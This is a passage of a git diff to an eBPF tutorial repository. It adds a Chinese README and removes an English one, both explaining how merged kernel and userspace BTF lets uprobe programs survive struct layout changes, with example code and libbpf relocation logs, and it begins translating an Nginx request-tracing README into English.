**内核依赖性**:传统的eBPF程序和它们被编译的特定Linux内核版本紧密耦合。这是因为它们依赖于内核的特定内部数据结构和API,这些可能在内核版本间变化。 +- **可移植性问题**:如果你想在带有不同内核版本的不同Linux系统上运行一个eBPF程序,你通常需要为每个内核版本重新编译eBPF程序,这是一个麻烦而低效的过程。 + +### Co-RE的解决方案 + +- **抽象内核依赖性**:Co-RE使eBPF程序更具可移植性,通过使用BPF类型格式(BTF)和重定位来抽象特定的内核依赖。 +- **BPF类型格式(BTF)**:BTF提供了关于内核中数据结构和函数的丰富类型信息。这些元数据允许eBPF程序在运行时理解内核结构的布局。 +- **重定位**:编译支持Co-RE的eBPF程序包含在加载时解析的重定位。这些重定位根据运行内核的实际布局和地址调整程序对内核数据结构和函数的引用。 + +### Co-RE的优点 + +1. **编写一次,任何地方运行**:编译有Co-RE的eBPF程序可以在不同的内核版本上运行,无需重新编译。这大大简化了在多样环境中部署和维护eBPF程序。 +2. **安全和稳定**:Co-RE保持了eBPF的安全性,确保程序不会导致内核崩溃,遵守安全约束。 +3. 
**简单的开发**:开发者不需要关注每个内核版本的具体情况,这简化了eBPF程序的开发。 + +## 用户空间应用程序CO-RE的问题 + +eBPF也支持追踪用户空间应用程序。Uprobe是一个用户空间探针,允许对用户空间程序进行动态仪表装置。探针位置包括函数入口、特定偏移和函数返回。 + +BTF是为内核设计的,生成自vmlinux,它可以帮助eBPF程序方便地兼容不同的内核版本。但是,用户空间应用程序也需要CO-RE。例如,SSL/TLS uprobe被广泛用于从加密流量中捕获明文数据。它是用用户空间库实现的,如OpenSSL、GnuTLS、NSS等。用户空间应用程序和库也有各种版本,如果我们需要为每个版本编译和维护eBPF程序,那就会很复杂。 + +下面是一些新的工具和方法,可以帮助我们为用户空间应用程序启用CO-RE。 + +## 用户空间程序的BTF + +这是一个简单的uprobe例子,它可以捕获用户空间程序的`add_test`函数的调用和参数。你可以在`uprobe.bpf.c`中添加`#define BPF_NO_PRESERVE_ACCESS_INDEX`来确保eBPF程序可以在没有`struct data`的BTF的情况下编译。 + +```c +#define BPF_NO_GLOBAL_DATA +#define BPF_NO_PRESERVE_ACCESS_INDEX +#include +#include +#include + +struct data { + int a; + int c; + int d; +}; + +SEC("uprobe/examples/btf-base:add_test") +int BPF_UPROBE(add_test, struct data *d) +{ + int a = 0, c = 0; + bpf_probe_read_user(&a, sizeof(a), &d->a); + bpf_probe_read_user(&c, sizeof(c), &d->c); + bpf_printk("add_test(&d) %d + %d = %d\n", a, c, a + c); + return a + c; +} + +char LICENSE[] SEC("license") = "Dual BSD/GPL"; +``` + +然后,我们有两个不同版本的用户空间程序,`examples/btf-base`和`examples/btf-base-new`。两个版本中的struct `data`是不同的。 + +`examples/btf-base`: + +```c +// use a different struct +struct data { + int a; + int c; + int d; +}; + +int add_test(struct data *d) { + return d->a + d->c; +} + +int main(int argc, char **argv) { + struct data d = {1, 3, 4}; + printf("add_test(&d) = %d\n", add_test(&d)); + return 0; +} +``` + +`examples/btf-base-new`: + +```c +struct data { + int a; + int b; + int c; + int d; +}; + +int add_test(struct data *d) { + return d->a + d->c; +} + +int main(int argc, char **argv) { + struct data d = {1, 2, 3, 4}; + printf("add_test(&d) = %d\n", add_test(&d)); + return 0; +} +``` + +我们可以使用pahole和clang来生成每个版本的btf。制作示例并生成btf: + +```sh +make -C example # it's like: pahole --btf_encode_detached base.btf btf-base.o +``` + +然后我们执行eBPF程序和用户空间程序。 对于 `btf-base`: + +```sh +sudo ./uprobe examples/btf-base +``` + +也是用户空间程序: + +```console +$ examples/btf-base +add_test(&d) = 4 +``` + +我们将看到: + +```console +$ sudo cat /sys/kernel/debug/tracing/trace_pipe\ + <...>-25458 [000] ...11 27694.081465: bpf_trace_printk: add_test(&d) 1 + 3 = 4 +``` + +对于 `btf-base-new`: + +```sh +sudo ./uprobe examples/btf-base-new +``` + +同时也是用户空间程序: + +```console +$ examples/btf-base-new +add_test(&d) = 4 +``` + +但我们可以看到: + +```console +$ sudo cat /sys/kernel/debug/tracing/trace_pipe\ + <...>-25809 [001] ...11 27828.314224: bpf_trace_printk: add_test(&d) 1 + 2 = 3 +``` + +结果是不同的,因为两个版本中的struct `data`是不同的。eBPF程序无法与不同版本的用户空间程序兼容,我们获取到了错误的结构体偏移量,也会导致我们追踪失败。 + +## 使用用户空间程序的BTF + +在`uprobe.bpf.c`中注释掉`#define BPF_NO_PRESERVE_ACCESS_INDEX` ,以确保eBPF程序可以以`struct data`的BTF编译。 + +```c +#define BPF_NO_GLOBAL_DATA +// #define BPF_NO_PRESERVE_ACCESS_INDEX +#include +#include +#include + +#ifndef BPF_NO_PRESERVE_ACCESS_INDEX +#pragma clang attribute push (__attribute__((preserve_access_index)), apply_to = record) +#endif + +struct data { + int a; + int c; + int d; +}; + +#ifndef BPF_NO_PRESERVE_ACCESS_INDEX +#pragma clang attribute pop +#endif + +SEC("uprobe/examples/btf-base:add_test") +int BPF_UPROBE(add_test, struct data *d) +{ + int a = 0, c = 0; + bpf_probe_read_user(&a, sizeof(a), &d->a); + bpf_probe_read_user(&c, sizeof(c), &d->c); + bpf_printk("add_test(&d) %d + %d = %d\n", a, c, a + c); + return a + c; +} + +char LICENSE[] SEC("license") = "Dual BSD/GPL"; +``` + +`struct data`的记录在eBPF程序中被保留下来。然后,我们可以使用 `btf-base.btf`来编译eBPF程序。 + +将用户btf与内核btf合并,这样我们就有了一个完整的内核和用户空间的btf: + +```sh +./merge-btf /sys/kernel/btf/vmlinux examples/base.btf target-base.btf 
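+# 生成的 target-base.btf 同时包含内核类型和用户态程序中 struct data 的类型信息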
+```
+
+Then we run the eBPF program with the userspace program. For `btf-base`:
+
+```console
+$ sudo ./uprobe examples/btf-base target-base.btf
+...
+libbpf: prog 'add_test': relo #1: patched insn #4 (ALU/ALU64) imm 0 -> 0
+libbpf: prog 'add_test': relo #2: [7] struct data.c (0:1 @ offset 4)
+libbpf: prog 'add_test': relo #2: matching candidate #0 [133110] struct data.c (0:1 @ offset 4)
+libbpf: prog 'add_test': relo #2: patched insn #11 (ALU/ALU64) imm 4 -> 4
+...
+```
+
+Run the userspace program and check the result:
+
+```console
+$ sudo cat /sys/kernel/debug/tracing/trace_pipe
+[sudo] password for yunwei37:
+ <...>-26740 [001] ...11 28180.156220: bpf_trace_printk: add_test(&d) 1 + 3 = 4
+```
+
+We can do the same for the other version of the userspace program, `btf-base-new`:
+
+```console
+$ ./merge-btf /sys/kernel/btf/vmlinux examples/base-new.btf target-base-new.btf
+$ sudo ./uprobe examples/btf-base-new target-base-new.btf
+....
+libbpf: sec 'uprobe/examples/btf-base:add_test': found 3 CO-RE relocations
+libbpf: CO-RE relocating [2] struct pt_regs: found target candidate [357] struct pt_regs in [vmlinux]
+libbpf: prog 'add_test': relo #0: [2] struct pt_regs.di (0:14 @ offset 112)
+libbpf: prog 'add_test': relo #0: matching candidate #0 [357] struct pt_regs.di (0:14 @ offset 112)
+libbpf: prog 'add_test': relo #0: patched insn #0 (LDX/ST/STX) off 112 -> 112
+libbpf: CO-RE relocating [7] struct data: found target candidate [133110] struct data in [vmlinux]
+libbpf: prog 'add_test': relo #1: [7] struct data.a (0:0 @ offset 0)
+libbpf: prog 'add_test': relo #1: matching candidate #0 [133110] struct data.a (0:0 @ offset 0)
+libbpf: prog 'add_test': relo #1: patched insn #4 (ALU/ALU64) imm 0 -> 0
+libbpf: prog 'add_test': relo #2: [7] struct data.c (0:1 @ offset 4)
+libbpf: prog 'add_test': relo #2: matching candidate #0 [133110] struct data.c (0:2 @ offset 8)
+libbpf: prog 'add_test': relo #2: patched insn #11 (ALU/ALU64) imm 4 -> 8
+libbpf: elf: symbol address match for 'add_test' in 'examples/btf-base-new': 0x1140
+Successfully started! Press Ctrl+C to stop.
+```
+
+The result is correct:
+
+```console
+$ sudo cat /sys/kernel/debug/tracing/trace_pipe
+[sudo] password for yunwei37:
+ <...>-26740 [001] ...11 28180.156220: bpf_trace_printk: add_test(&d) 1 + 3 = 4
+```
+
+Our eBPF tracing program needs almost no modification; we only have to load the BTF that contains the kernel and userspace struct offsets. This is the same usage as on older kernels that ship without BTF information:
+
+```c
+    LIBBPF_OPTS(bpf_object_open_opts, opts);
+    LIBBPF_OPTS(bpf_uprobe_opts, uprobe_opts);
+    if (argc != 3 && argc != 2) {
+        fprintf(stderr, "Usage: %s <target-binary> [custom-btf-path]\n", argv[0]);
+        return 1;
+    }
+    if (argc == 3)
+        opts.btf_custom_path = argv[2];
+
+    /* Set up libbpf errors and debug info callback */
+    libbpf_set_print(libbpf_print_fn);
+
+    /* Cleaner handling of Ctrl-C */
+    signal(SIGINT, sig_handler);
+    signal(SIGTERM, sig_handler);
+
+    /* Load and verify BPF application */
+    skel = uprobe_bpf__open_opts(&opts);
+    if (!skel) {
+        fprintf(stderr, "Failed to open and load BPF skeleton\n");
+        return 1;
+    }
+```
+
+In fact, BTF-based relocation needs two parts: the compile-time BTF information carried by the BPF program, and the BTF information available when the eBPF program is actually loaded. At load time, libbpf rewrites potentially incorrect eBPF instructions according to the accurate BTF information of the running kernel, ensuring compatibility across kernel versions.
+
+Interestingly, libbpf does not distinguish whether this BTF information comes from a userspace program or from the kernel, so we only need to hand the userspace relocation information to libbpf together with the kernel's, and the problem is solved.
+
+The tools and complete code for this article are open-sourced at [https://github.com/eunomia-bpf/bpf-developer-tutorial](https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/38-btf-uprobe).
+
+## Conclusion
+
+- **Flexibility and compatibility**: Using BTF in userspace eBPF programs greatly enhances their flexibility and compatibility across different versions of userspace applications and libraries.
+- **Reduced complexity**: This approach significantly reduces the complexity of maintaining eBPF programs for different versions of userspace applications, because it eliminates the need for multiple program versions.
+- **Broader applications**: The approach may also find wider use in performance monitoring, security, and debugging of userspace applications. [bpftime](https://github.com/eunomia-bpf/bpftime) is an open-source userspace eBPF runtime based on LLVM JIT/AOT. It runs eBPF programs in user space and is compatible with kernel-mode eBPF. While supporting uprobes, syscall tracing, and general plugin extensions, it avoids context switches between kernel and user space, improving the execution efficiency of uprobe programs. With the support of libbpf and BTF, bpftime can also extend userspace applications more dynamically, achieving compatibility across different versions of userspace programs.
+
+This example shows how, in practice, eBPF can extend its powerful CO-RE capability to handle version changes of userspace applications more dynamically.
+
+If you want to learn more about eBPF knowledge and practices, you can visit our tutorial code repository or website for more examples and complete tutorials.
diff --git a/src/38-btf-uprobe/README_en.md b/src/38-btf-uprobe/README_en.md
deleted file mode 100644
index aa1a0e6..0000000
--- a/src/38-btf-uprobe/README_en.md
+++ /dev/null
@@ -1,313 +0,0 @@
-# Expanding eBPF Compile Once, Run Everywhere (CO-RE) to Userspace Compatibility
-
-> Yusheng
-
-eBPF, short for extended Berkeley Packet Filter, is a powerful and versatile technology used in modern Linux systems. It allows for the running of sandboxed programs in a virtual machine-like environment within the kernel, providing a safe way to extend the capabilities of the kernel without the risk of crashing the system or compromising security.
-
-Co-RE, standing for 'Compile Once, Run Everywhere', tackles the critical issue of eBPF program compatibility across diverse kernel versions. This feature allows eBPF programs to run on various kernel versions without the need for recompilation, simplifying deployment and maintenance.
-
-With eBPF Uprobe, you can also trace userspace applications and access their internal data structures. However, CO-RE is not designed for userspace applications. This blog will introduce how to leverage CO-RE for user-space applications, ensuring eBPF Uprobe programs remain compatible across different application versions without the need for multiple compilations.
-
-This approach may be particularly beneficial for tracing applications like OpenSSL, where maintaining separate eBPF programs for each version is impractical. With userspace eBPF runtimes like bpftime, you can also expand CO-RE to more use cases, including extensions, networking, and dynamic patching, providing versatile and efficient solutions.
-
-To implement the Co-RE feature of eBPF in user-space applications, we also need to utilize the BPF Type Format (BTF) to overcome some of the limitations of traditional eBPF programs. The key to this approach lies in providing user-space programs with similar type information and compatibility support as the kernel, thereby enabling eBPF programs to more flexibly handle different versions of user-space applications and libraries.
-
-This article is part of the eBPF Developer Tutorial, and for more detailed content, you can visit [https://eunomia.dev/tutorials/](https://eunomia.dev/tutorials/). The source code is available at [https://github.com/eunomia-bpf/bpf-developer-tutorial](https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/38-btf-uprobe).
-
-## Why do we need CO-RE?
-
-- **Kernel Dependencies**: Traditional eBPF programs are tightly coupled with the specific Linux kernel version they are compiled for. This is because they rely on specific internal data structures and kernel APIs which can change between kernel versions.
-- **Portability Issues**: If you wanted to run an eBPF program on different Linux systems with different kernel versions, you'd traditionally have to recompile the eBPF program for each kernel version, which is a cumbersome and inefficient process.
-
-### The Co-RE Solution
-
-- **Abstracting Kernel Dependencies**: Co-RE enables eBPF programs to be more portable by abstracting away specific kernel dependencies. This is achieved through the use of BPF Type Format (BTF) and relocations.
-- **BPF Type Format (BTF)**: BTF provides rich type information about data structures and functions in the kernel. This metadata allows eBPF programs to understand the layout of kernel structures at runtime.
-- **Relocations**: eBPF programs compiled with Co-RE support contain relocations that are resolved at load time. These relocations adjust the program's references to kernel data structures and functions according to the actual layout and addresses in the running kernel.
-
-### Advantages of Co-RE
-
-1. **Write Once, Run Anywhere**: eBPF programs compiled with Co-RE can run on different kernel versions without the need for recompilation. This greatly simplifies the deployment and maintenance of eBPF programs in diverse environments.
-2. **Safety and Stability**: Co-RE maintains the safety guarantees of eBPF, ensuring that programs do not crash the kernel and adhere to security constraints.
-3. **Ease of Development**: Developers don't need to worry about the specifics of each kernel version, which simplifies the development of eBPF programs.
-
-## Problem: userspace application CO-RE
-
-eBPF also supports tracing userspace applications. Uprobe is a user-space probe that allows dynamic instrumentation in user-space programs. The probe locations include function entry, specific offsets, and function returns.
-
-BTF is designed for the kernel and generated from vmlinux, so it can help the eBPF program to be easily compatible with different kernel versions.
-
-The userspace application, however, also needs CO-RE. For example, the SSL/TLS uprobe is widely used to capture the plaintext data from encrypted traffic. It is implemented with userspace libraries such as OpenSSL, GnuTLS, NSS, etc. Userspace applications and libraries also have different versions; it would be complex if we needed to compile and maintain the eBPF program for each version.
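To make the cost of that version drift concrete, here is a tiny standalone C illustration (mirroring this tutorial's `struct data`) of how adding one field shifts the offsets that a compiled probe bakes in:

```c
#include <stdio.h>
#include <stddef.h>

/* v1 layout: c sits at offset 4 */
struct data_v1 { int a; int c; int d; };

/* v2 layout: the new field b pushes c to offset 8 */
struct data_v2 { int a; int b; int c; int d; };

int main(void) {
    printf("v1: c at offset %zu\n", offsetof(struct data_v1, c)); /* 4 */
    printf("v2: c at offset %zu\n", offsetof(struct data_v2, c)); /* 8 */
    return 0;
}
```

A probe compiled against v1 that hard-codes offset 4 will silently read `b` instead of `c` on v2, which is exactly the wrong-result case demonstrated next.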
-
-Let's see what will happen if CO-RE is not enabled for userspace applications, and how BTF from userspace applications can solve this.
-
-## No BTF for the userspace program
-
-This is a simple uprobe example; it can capture the function call and arguments of the `add_test` function in the userspace program. You can add `#define BPF_NO_PRESERVE_ACCESS_INDEX` in the `uprobe.bpf.c` to make sure the eBPF program can be compiled without BTF for `struct data`.
-
-```c
-#define BPF_NO_GLOBAL_DATA
-#define BPF_NO_PRESERVE_ACCESS_INDEX
-#include <vmlinux.h>
-#include <bpf/bpf_helpers.h>
-#include <bpf/bpf_tracing.h>
-
-struct data {
-    int a;
-    int c;
-    int d;
-};
-
-SEC("uprobe/examples/btf-base:add_test")
-int BPF_UPROBE(add_test, struct data *d)
-{
-    int a = 0, c = 0;
-    bpf_probe_read_user(&a, sizeof(a), &d->a);
-    bpf_probe_read_user(&c, sizeof(c), &d->c);
-    bpf_printk("add_test(&d) %d + %d = %d\n", a, c, a + c);
-    return a + c;
-}
-
-char LICENSE[] SEC("license") = "Dual BSD/GPL";
-```
-
-Then, we have two different versions of the userspace program, `examples/btf-base` and `examples/btf-base-new`. The struct `data` is different in the two versions.
-
-`examples/btf-base`:
-
-```c
-#include <stdio.h>
-
-// use a different struct
-struct data {
-    int a;
-    int c;
-    int d;
-};
-
-int add_test(struct data *d) {
-    return d->a + d->c;
-}
-
-int main(int argc, char **argv) {
-    struct data d = {1, 3, 4};
-    printf("add_test(&d) = %d\n", add_test(&d));
-    return 0;
-}
-```
-
-`examples/btf-base-new`:
-
-```c
-#include <stdio.h>
-
-struct data {
-    int a;
-    int b;
-    int c;
-    int d;
-};
-
-int add_test(struct data *d) {
-    return d->a + d->c;
-}
-
-int main(int argc, char **argv) {
-    struct data d = {1, 2, 3, 4};
-    printf("add_test(&d) = %d\n", add_test(&d));
-    return 0;
-}
-```
-
-We can use pahole and clang to generate the BTF for each version of the userspace application. The pahole tool can simply generate BTF from the debug info.
-
-Build the examples and generate BTF for them:
-
-```sh
-make -C example # it's like: pahole --btf_encode_detached base.btf btf-base.o
-```
-
-Then we execute the eBPF program with the userspace program. For `btf-base`:
-
-```sh
-sudo ./uprobe examples/btf-base
-```
-
-And also the userspace program:
-
-```console
-$ examples/btf-base
-add_test(&d) = 4
-```
-
-We will see:
-
-```console
-$ sudo cat /sys/kernel/debug/tracing/trace_pipe
- <...>-25458 [000] ...11 27694.081465: bpf_trace_printk: add_test(&d) 1 + 3 = 4
-```
-
-For `btf-base-new`:
-
-```sh
-sudo ./uprobe examples/btf-base-new
-```
-
-And also the userspace program:
-
-```console
-$ examples/btf-base-new
-add_test(&d) = 4
-```
-
-But we will see:
-
-```console
-$ sudo cat /sys/kernel/debug/tracing/trace_pipe
- <...>-25809 [001] ...11 27828.314224: bpf_trace_printk: add_test(&d) 1 + 2 = 3
-```
-
-The result is different because the struct `data` is different in the two versions. The eBPF program can't be compatible with different versions of the userspace program, so we cannot get the correct information.
-
-## Use BTF for the userspace program
-
-Comment out the `#define BPF_NO_PRESERVE_ACCESS_INDEX` in the `uprobe.bpf.c` to make sure the eBPF program can be compiled with BTF for `struct data`.
-```c
-#define BPF_NO_GLOBAL_DATA
-// #define BPF_NO_PRESERVE_ACCESS_INDEX
-#include <vmlinux.h>
-#include <bpf/bpf_helpers.h>
-#include <bpf/bpf_tracing.h>
-
-#ifndef BPF_NO_PRESERVE_ACCESS_INDEX
-#pragma clang attribute push (__attribute__((preserve_access_index)), apply_to = record)
-#endif
-
-struct data {
-    int a;
-    int c;
-    int d;
-};
-
-#ifndef BPF_NO_PRESERVE_ACCESS_INDEX
-#pragma clang attribute pop
-#endif
-
-SEC("uprobe/examples/btf-base:add_test")
-int BPF_UPROBE(add_test, struct data *d)
-{
-    int a = 0, c = 0;
-    bpf_probe_read_user(&a, sizeof(a), &d->a);
-    bpf_probe_read_user(&c, sizeof(c), &d->c);
-    bpf_printk("add_test(&d) %d + %d = %d\n", a, c, a + c);
-    return a + c;
-}
-
-char LICENSE[] SEC("license") = "Dual BSD/GPL";
-```
-
-The record of `struct data` is preserved in the eBPF program. Then, we can use the `btf-base.btf` to compile the eBPF program.
-
-Merge the user BTF with the kernel BTF, so we have complete BTF for the kernel and userspace:
-
-```sh
-./merge-btf /sys/kernel/btf/vmlinux examples/base.btf target-base.btf
-```
-
-Then we execute the eBPF program with the userspace program. For `btf-base`:
-
-```console
-$ sudo ./uprobe examples/btf-base target-base.btf
-...
-libbpf: prog 'add_test': relo #1: patched insn #4 (ALU/ALU64) imm 0 -> 0
-libbpf: prog 'add_test': relo #2: [7] struct data.c (0:1 @ offset 4)
-libbpf: prog 'add_test': relo #2: matching candidate #0 [133110] struct data.c (0:1 @ offset 4)
-libbpf: prog 'add_test': relo #2: patched insn #11 (ALU/ALU64) imm 4 -> 4
-...
-```
-
-Execute the userspace program and get the result:
-
-```console
-$ sudo cat /sys/kernel/debug/tracing/trace_pipe
-[sudo] password for yunwei37:
- <...>-26740 [001] ...11 28180.156220: bpf_trace_printk: add_test(&d) 1 + 3 = 4
-
-```
-
-Also, we do the same for the other version of the userspace program, `btf-base-new`:
-
-```console
-$ ./merge-btf /sys/kernel/btf/vmlinux examples/base-new.btf target-base-new.btf
-$ sudo ./uprobe examples/btf-base-new target-base-new.btf
-....
-libbpf: sec 'uprobe/examples/btf-base:add_test': found 3 CO-RE relocations
-libbpf: CO-RE relocating [2] struct pt_regs: found target candidate [357] struct pt_regs in [vmlinux]
-libbpf: prog 'add_test': relo #0: [2] struct pt_regs.di (0:14 @ offset 112)
-libbpf: prog 'add_test': relo #0: matching candidate #0 [357] struct pt_regs.di (0:14 @ offset 112)
-libbpf: prog 'add_test': relo #0: patched insn #0 (LDX/ST/STX) off 112 -> 112
-libbpf: CO-RE relocating [7] struct data: found target candidate [133110] struct data in [vmlinux]
-libbpf: prog 'add_test': relo #1: [7] struct data.a (0:0 @ offset 0)
-libbpf: prog 'add_test': relo #1: matching candidate #0 [133110] struct data.a (0:0 @ offset 0)
-libbpf: prog 'add_test': relo #1: patched insn #4 (ALU/ALU64) imm 0 -> 0
-libbpf: prog 'add_test': relo #2: [7] struct data.c (0:1 @ offset 4)
-libbpf: prog 'add_test': relo #2: matching candidate #0 [133110] struct data.c (0:2 @ offset 8)
-libbpf: prog 'add_test': relo #2: patched insn #11 (ALU/ALU64) imm 4 -> 8
-libbpf: elf: symbol address match for 'add_test' in 'examples/btf-base-new': 0x1140
-Successfully started! Press Ctrl+C to stop.
-```
- -The eBPF uprobe tracing program almost doesn't need any modifications. We just need to load the BTF containing the offsets of kernel and user-space structures. This is the same usage as enabling CO-RE on older kernel versions without BTF information: - -```c - LIBBPF_OPTS(bpf_object_open_opts , opts, - ); - LIBBPF_OPTS(bpf_uprobe_opts, uprobe_opts); - if (argc != 3 && argc != 2) { - fprintf(stderr, "Usage: %s []\n", argv[0]); - return 1; - } - if (argc == 3) - opts.btf_custom_path = argv[2]; - - /* Set up libbpf errors and debug info callback */ - libbpf_set_print(libbpf_print_fn); - - /* Cleaner handling of Ctrl-C */ - signal(SIGINT, sig_handler); - signal(SIGTERM, sig_handler); - - /* Load and verify BPF application */ - skel = uprobe_bpf__open_opts(&opts); - if (!skel) { - fprintf(stderr, "Failed to open and load BPF skeleton\n"); - return 1; - } -``` - -In fact, the BTF implementation for relocation requires two parts: the compile-time BTF information carried by the BPF program, and the BTF information of the kernel when loading the eBPF program. When actually loading the eBPF program, libbpf will modify potentially incorrect eBPF instructions based on the accurate BTF information of the current kernel, ensuring compatibility across different kernel versions. - -Interestingly, libbpf does not differentiate whether these BTF information come from user-space programs or the kernel. Therefore, by merging the user-space BTF information with kernel BTF and provide them to libbpf, the problem is solved. - -And also, since the relocation is happened in userspace loader(like libbpf), both kernel eBPF runtime and userspace eBPF runtimes(Such as bpftime) can benefit from the CO-RE. bpftime () is an open-source user-space eBPF runtime based on LLVM JIT/AOT. It enables the execution of eBPF programs in user space, compatible with kernel-space eBPF. While supporting uprobes, syscall trace, and general plugin extensions, it avoids the context switching between kernel and user spaces, thereby enhancing the execution efficiency of uprobe programs. With the support of libbpf and BTF, bpftime can also dynamically extend user-space applications, achieving compatibility across different versions of user-space programs. - -For more details about BTF relocation, you may refer to - -## Conclusion - -- **Flexibility and Compatibility**: The use of BTF in user-space eBPF programs greatly enhances their flexibility and compatibility across different versions of user-space applications and libraries. -- **Reduced Complexity**: This approach significantly reduces the complexity involved in maintaining eBPF programs for different versions of user-space applications, as it eliminates the need for multiple program versions. -- **Potential for Broader Application**: While your example focused on SSL/TLS monitoring, this methodology may has broader applications in performance monitoring, security, and debugging of user-space applications. - -This example showcases a significant advancement in the practical application of eBPF, extending its powerful features to more dynamically handle user-space applications in a Linux environment. It's a compelling solution for software engineers and system administrators dealing with the complexities of modern Linux systems. - -If you want to learn more about eBPF knowledge and practices, you can visit our tutorial code repository or website to get more examples and complete tutorials. 
diff --git a/src/39-nginx/README.md b/src/39-nginx/README.md index 1fa4cf2..44ff33f 100644 --- a/src/39-nginx/README.md +++ b/src/39-nginx/README.md @@ -1,116 +1,114 @@ -# 使用 eBPF 跟踪 Nginx 请求 +# Using eBPF to Trace Nginx Requests -## 引言 +Nginx is one of the most popular web servers and reverse proxies in the world, known for its high performance, stability, and low resource consumption. It is widely used for serving static content, load balancing, and acting as a reverse proxy for dynamic applications. To maintain its performance edge, it's crucial to monitor and optimize Nginx's operations, especially when handling a large number of requests. One powerful way to gain insights into Nginx's performance is by using eBPF (Extended Berkeley Packet Filter). -Nginx 是世界上最流行的 Web 服务器和反向代理之一,以其高性能、稳定性和低资源消耗而闻名。它广泛用于提供静态内容、负载均衡以及作为动态应用的反向代理。为了保持其性能优势,监控和优化 Nginx 的运行尤为重要,尤其是在处理大量请求时。利用 eBPF(扩展的伯克利包过滤器),可以深入了解 Nginx 的性能表现,识别瓶颈并进行优化,而无需修改源代码或重启服务。 +eBPF is a revolutionary technology that allows developers to run custom programs in the Linux kernel. Originally designed for network packet filtering, eBPF has evolved into a versatile tool for tracing, monitoring, and profiling system behavior in both kernel and user space. By leveraging eBPF, you can trace Nginx's critical functions, measure latency, and identify bottlenecks without modifying the source code or restarting the service. -eBPF 是一项革命性技术,允许开发人员在 Linux 内核中运行自定义程序。最初设计用于网络数据包过滤,但 eBPF 现已发展为一个多功能工具,广泛应用于跟踪、监控和分析系统行为。通过利用 eBPF,您可以跟踪 Nginx 的关键函数,测量延迟,识别瓶颈,进而优化系统性能。 - -## 背景:Nginx 和 eBPF +## Background: Nginx and eBPF ### Nginx -Nginx 采用事件驱动架构,使其在资源占用极少的情况下能够高效处理成千上万的并发连接。这种高效性依赖于其请求处理、响应生成和事件处理等多个性能关键函数。了解这些函数在不同负载下的表现对于优化 Nginx 的使用至关重要。 +Nginx operates on an event-driven architecture, making it highly efficient and capable of handling thousands of simultaneous connections with minimal resources. This efficiency is achieved through various performance-critical functions involved in request processing, response generation, and event handling. Understanding how these functions behave under different loads is key to optimizing Nginx for your specific use case. ### eBPF -eBPF 程序在 Linux 内核的安全沙盒环境中运行。这些程序可以附加到各种钩子上,如系统调用、跟踪点,甚至可以通过 uprobes(用户级探针)附加到用户空间的函数。这使得 eBPF 成为一个强大的系统可观测性工具,可以收集详细的性能数据并实时执行策略。 +eBPF programs run in a secure, sandboxed environment within the Linux kernel. These programs can attach to various hooks, such as system calls, tracepoints, and even user-space functions via uprobes (user-level probes). This capability allows you to collect detailed performance data and enforce policies in real time, making eBPF an invaluable tool for system observability. -eBPF 的一个常见用例是跟踪函数执行时间,以测量延迟。这对于了解 Nginx 中特定函数的执行时间特别有用,有助于诊断性能问题、优化资源使用,并提高 Nginx 部署的整体效率。 +One common use case of eBPF is tracing function execution to measure latency, which is particularly useful for understanding how long specific Nginx functions take to execute. This information can help in diagnosing performance issues, optimizing resource usage, and improving the overall efficiency of your Nginx deployment. ### Uprobes -Uprobes 是一种用于跟踪用户空间应用程序函数的探针,它通过附加到特定用户空间函数的入口和出口点,可以捕获精确的时间信息。然而,需要注意的是,在内核模式 eBPF 运行时使用 uprobes 可能会带来一定的性能开销。为此,您可以考虑使用基于 LLVM JIT/AOT 的用户模式 eBPF 运行时 [bpftime](https://github.com/eunomia-bpf/bpftime)。这种运行时可以在用户空间中运行 eBPF 程序,与内核模式 eBPF 兼容,并有可能降低开销。 +Uprobes are a type of probe that can be used to trace functions in user-space applications, such as Nginx. 
They work by attaching to specific user-space function entry and exit points, allowing you to capture precise timing information. However, it’s important to note that using uprobes in the kernel mode eBPF runtime may cause some performance overhead. To mitigate this, you can consider using a user-mode eBPF runtime like [bpftime](https://github.com/eunomia-bpf/bpftime), which is based on LLVM JIT/AOT. This runtime can run eBPF programs in user space, offering compatibility with kernel mode eBPF while potentially reducing overhead. -## Nginx 的性能关键函数 +## Performance-Critical Functions in Nginx -以下是 Nginx 中一些性能关键的函数,可以通过 eBPF 进行监控: +Here are some key Nginx functions that are performance-critical and can be monitored using eBPF: -- **ngx_http_process_request**:负责处理传入的 HTTP 请求。监控此函数有助于跟踪请求处理的开始。 -- **ngx_http_upstream_send_request**:当 Nginx 作为反向代理时,负责向上游服务器发送请求。 -- **ngx_http_finalize_request**:完成 HTTP 请求的处理,包括发送响应。跟踪此函数可以衡量整个请求处理的时间。 -- **ngx_event_process_posted**:处理事件循环中的队列事件。 -- **ngx_handle_read_event**:负责处理来自套接字的读取事件,对监控网络 I/O 性能至关重要。 -- **ngx_writev_chain**:负责将响应发送回客户端,通常与写事件循环结合使用。 +- **ngx_http_process_request**: Processes incoming HTTP requests. Monitoring this function helps track the start of request handling. +- **ngx_http_upstream_send_request**: Handles sending requests to upstream servers when Nginx is acting as a reverse proxy. +- **ngx_http_finalize_request**: Finalizes HTTP request processing, including sending the response. Tracing this can measure total request handling time. +- **ngx_event_process_posted**: Processes queued events as part of the Nginx event loop. +- **ngx_handle_read_event**: Handles read events from sockets, crucial for monitoring network I/O performance. +- **ngx_writev_chain**: Sends responses back to the client, typically used in conjunction with the write event loop. -## 使用 bpftrace 跟踪 Nginx 函数 +## Using bpftrace to Trace Nginx Functions -为了监控这些函数,我们可以使用 `bpftrace`,一种 eBPF 的高级跟踪语言。以下是一个用于跟踪几个关键 Nginx 函数执行时间的脚本: +To monitor these functions, we can use `bpftrace`, a high-level tracing language for eBPF. 
